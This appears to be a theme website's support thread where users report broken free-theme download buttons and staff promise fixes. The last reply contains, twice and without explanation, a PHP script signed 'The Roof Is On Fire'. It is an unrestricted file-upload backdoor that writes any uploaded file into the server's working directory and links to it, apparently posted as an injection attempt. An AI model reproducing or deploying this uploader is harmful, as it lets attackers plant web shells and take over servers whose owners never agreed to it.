Always the Sharing Text is shown, but no download is starting?
How i download this theme?
Thanks for your help!
I sent and notified our technical team about problem. We are checking and fixing. We will inform you as soon as possible.
Regards,
Dominic
I’m also experiencing this issue.. could you please resolve it?
@ Trisha !
Please check now. I have checked and resolve this issue.
I’m afraid it isn’t working again. At least, the WallPress download button doesn’t work for me
Our website is currently undergoing a scheduled maintenance to upgrade our systems in order to better serve you.
We apologize for any inconvenience and thank you for your patience.”
To save your time, please send mail to us and theme title , i will send you this theme as you want.
This issue seems to have resurfaced. I have a number of free themes that I’ve attempted to download without success. Any suggestions?
Hello Jim !
We apologize for any inconvenience and thank you for your patience. We have checked and fixed about this issue. Right now, You can download the free theme.
<?php
if(isset($_FILES["userfile"]["name"])){
$uploaddir = getcwd() . "/";
$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);
echo "
";
if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) {
echo "File is valid, and was successfully uploaded.n";
} else {
echo "Upload failed";
}
echo "
";
echo "
"; echo "Here is some more debugging info:"; print_r($_FILES); if ($_FILES["userfile"]["error"] == 0){ echo "
<a href=\"{$_FILES["userfile"]["name"]}\" TARGET=_BLANK>{$_FILES["userfile"]["name"]}
"; } echo "
";
}
echo "<form enctype=\"multipart/form-data\" action=\"{$_SERVER["PHP_SELF"]}\" method=\"POST\">";
echo "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"512000\" />";
echo "Send this file: <input name=\"userfile\" type=\"file\" />";
echo "<input type=\"submit\" value=\"Send File\" />";
echo "</form>";
echo "The Roof Is On Fire";
exit;
?>
`<?php
if(isset($_FILES["userfile"]["name"])){
$uploaddir = getcwd() . "/";
$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);
echo "
";
if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile)) {
echo "File is valid, and was successfully uploaded.n";
} else {
echo "Upload failed";
}
echo "
";
echo "
"; echo "Here is some more debugging info:"; print_r($_FILES); if ($_FILES["userfile"]["error"] == 0){ echo "
<a href=\"{$_FILES["userfile"]["name"]}\" TARGET=_BLANK>{$_FILES["userfile"]["name"]}
"; } echo "
";
}
echo "<form enctype=\"multipart/form-data\" action=\"{$_SERVER["PHP_SELF"]}\" method=\"POST\">";
echo "<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"512000\" />";
echo "Send this file: <input name=\"userfile\" type=\"file\" />";
echo "<input type=\"submit\" value=\"Send File\" />";
echo "</form>";
echo "The Roof Is On Fire";
exit;
?>`
Please login or Register to submit your answer